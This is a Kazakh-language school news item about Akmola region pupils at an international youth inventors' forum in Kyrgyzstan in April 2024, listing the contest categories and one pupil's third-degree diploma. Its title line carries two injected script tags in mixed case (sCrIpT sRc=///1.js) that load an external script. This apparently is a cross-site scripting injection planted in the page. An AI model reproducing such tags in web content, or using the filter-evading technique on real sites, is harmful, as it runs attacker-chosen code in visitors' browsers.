«Біз-ХХI ғасыр интеллектуалдарымыз» Халықаралық жастар форумына қатысу қорытындысы туралы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

04.09.2024

2024 жылдың 23-26 сәуір аралығында Қырғызстан мемлекетінде Ысык-көл облысында «Біз-ХХI ғасыр интеллектуалдарымыз» Халықаралық жастар форумы өтті.  Халықаралық форумды Қырғыз Республикасының Білім және ғылым министрлігі және Қырғызстанның оқушы жастарына ғылыми-техникалық білім беруді дамыту үшін «Алтын тұйын» ұлттық балалар инженерлік-техникалық академиясы ұйымдастырды.

Форумға Қырғыз Республикасының барлық облыстарынан, Ресей Федерациясынан, Қазақстаннан, Өзбекстаннан және Әзірбайжаннан келген жас өнертапқыштар қатысты. Форумға қатысу үшін 250-ден астам зерттеу және инновациялық жобалар жарияланды.

Жобаларды қорғау 6 номинация бойынша өтті:

1.Жаңа теориялық әзірлемелер мен модельдер;

2. Аспаптар, радио жабдықтар және телекоммуникациялық жүйелер;

3. Энергия және энергияны үнемдейтін технологиялар;

4. Ақпараттық технологиялар және бағдарламалау;

5. Робототехника және автоматтандырылған технологиялар;

6.Стендтік модельдер.

Ақмола облысынан Бұланды ауданы, Никольское ауылының № 2 жалпы білім беретін мектебінің 9-сынып оқушылары Максим Журавлёв және Асанали Ашимов, Бұланды ауданы, Макинск қаласы мектеп-гимназиясының 10 сынып оқушысы Свидерская Анастасия қатысты.

Халықаралық жастар форумының қорытындысы бойынша Асанали Ашимов "Ядролық реактор моделі" секциясы бойынша «Новые теоретические разработки» атты тақырыбымен ІІІ-дәрежелі дипломмен марапатталды.

Шын жүректен марапаттарымен құттықтаймыз және сәттілік пен жаңа ғылыми жетістіктер тілейміз!!!

Просмотров: 134


Пікір қосу



Деректерді қолтаңбаға қосу